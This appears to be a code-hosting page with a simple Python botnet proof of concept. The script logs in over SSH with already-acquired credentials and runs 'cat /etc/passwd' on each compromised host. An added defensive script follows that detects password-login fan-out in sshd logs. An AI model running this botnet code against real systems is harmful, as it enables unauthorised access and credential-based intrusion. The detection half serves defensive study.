Botnet

Implementation of a botnet script (without command & control), just as a POC

#!/usr/bin/env python3

'''
This is a POC of a very simple botnet, where after acquiring a target's credentials
the attacker connects through ssh and executes the command 'cat /etc/passwd' on the target's system.
Usage: python3 botnet.py -i IPaddress -u Username -p Password
'''

from pexpect import pxssh
import argparse

class Bot: # template for each bot we add to the botnet

    # initialize new client
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.ssh()

    # secure shell into client/host
    def ssh(self):
        try:
            bot = pxssh.pxssh() # pxssh session object used to connect to the host
            bot.login(self.host, self.user, self.password)
            return bot
        except Exception as e:
            print("Connection Failure.")
            print(e)

    # send command to client
    def send_command(self, cmd): # connect to the terminal and send command
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before

# send a command to all bots in the botnet
def command_bots(command):
    for bot in botnet:
        attack = bot.send_command(command) # sends the command ('cat /etc/passwd')
        print(f"Output from {bot.host}") # prints host
        print(attack) # prints command output

# list of bots in botnet
botnet = []

# add a new bot to the botnet
def add_bot(host, user, password):
    new_bot = Bot(host, user, password)
    if new_bot.session is not None: # ssh() returns None when the login fails
        botnet.append(new_bot)

# get commandline arguments
def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", dest='host', help='type hostname or ip')
    parser.add_argument("-u", dest='user', help='type username')
    parser.add_argument("-p", dest='passwd', help='type password')
    options = parser.parse_args()
    host = options.host
    user = options.user
    password = options.passwd
    if host is None or user is None or password is None:
        parser.print_help()
        exit(0)
    add_bot(host, user, password)

get_arguments()

# read the target's account list (/etc/passwd)
command_bots('cat /etc/passwd')
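
On the defending side, the script above appears in sshd logs as successful password logins from one source address across several hosts. The following is an added example, not part of the original page, that flags that pattern; the log lines are constructed, and the host names, `min_hosts`, `window` and `year` values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the usual OpenSSH syslog format (not real data).
SAMPLE_LOG = """\
Mar  3 10:00:01 web01 sshd[1201]: Accepted password for deploy from 203.0.113.7 port 50122 ssh2
Mar  3 10:00:04 web02 sshd[883]: Accepted password for deploy from 203.0.113.7 port 50130 ssh2
Mar  3 10:00:09 db01 sshd[412]: Accepted password for deploy from 203.0.113.7 port 50141 ssh2
Mar  3 10:02:30 web01 sshd[1290]: Accepted publickey for alice from 198.51.100.20 port 40022 ssh2: ED25519 SHA256:constructed
Mar  3 11:30:00 web02 sshd[990]: Accepted password for bob from 198.51.100.20 port 40100 ssh2
Mar  3 10:00:02 web03 sshd[77]: Failed password for deploy from 203.0.113.7 port 50125 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted password for (?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_password_logins(log_text, year=2024):
    """Yield (time, host, user, src) for each successful password login."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog timestamps carry no year; the caller supplies one (assumption)
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["host"], m["user"], m["src"]

def find_fanout(log_text, min_hosts=3, window=timedelta(minutes=5)):
    """Map each source to the hosts it logged in to, if >= min_hosts within window.
    Both thresholds are assumed defaults; tune them to the environment."""
    by_src = defaultdict(list)
    for ts, host, _user, src in parse_password_logins(log_text):
        by_src[src].append((ts, host))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # distinct hosts reached inside the window that opens at this event
            hosts = {h for t, h in events[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                alerts[src] = sorted(hosts)
                break
    return alerts

if __name__ == "__main__":
    for src, hosts in find_fanout(SAMPLE_LOG).items():
        print(f"ALERT {src}: password logins to {len(hosts)} hosts: {', '.join(hosts)}")
```

Public-key logins and failed attempts are ignored on purpose, so the rule only fires on the credential reuse this POC depends on.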

Last updated 5 years ago